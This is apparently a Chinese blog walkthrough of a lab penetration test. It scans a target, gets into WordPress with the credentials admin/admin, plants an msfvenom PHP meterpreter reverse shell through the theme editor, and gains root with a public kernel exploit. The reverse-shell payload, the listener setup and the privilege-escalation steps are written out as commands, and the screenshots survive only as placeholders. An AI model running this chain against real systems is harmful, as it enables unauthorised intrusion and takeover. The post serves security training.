高难度渗透靶机

1、扫描靶机信息

 nmap -sV 192.168.222.130

image.png

 nmap -A -v -T4 192.168.222.130

image.png

 nikto -host 192.168.222.130             //扫描网站目录

image.png

 dirb http://192.168.222.130             //扫描关键信息

image.png

 由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞;
 wpscan -url url -enumerate at -enumerate ap --enumerate u
 wordpress基于php的CMS管理系统
 wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u

image.png

image.png

image.png

image.png

对网页进行弱密码测试

1、192.168.222.128/wordpress/login.php

 弱密码
 admin admin登录成功

2、点击Appearance > Editor > 编辑可以上传的webshell

 使用msfvenom生成可以接受到msf的回弹shell
 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php

image.png

上传成功之后访问该404网页

image.png

在msf中接受回弹结果

 msfconsole
 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp //设置payload
 set lhost 192.168.222.128   //设置回弹攻击机的IP地址
 set lport 4444  //设置回弹的端口

image.png

查看该系统的内核版本,进行内核渗透

image.png

sysinfo			查看系统信息
利用searchsploit Linux ubuntu 4.4.0		查看内核版本漏洞的exp

image.png

使用这个exp

gcc 41458.c -o shell		gcc编译完之后输出shell
在meterpreter上传刚才编译好的文件
upload shell

image.png

chmod 777 shell				//给与其最高权限
./shell					    //运行该程序
获得root权限

image.png

image.png

 

posted @ 2021-10-22 10:47  Star*~  阅读(106)  评论(1)    收藏  举报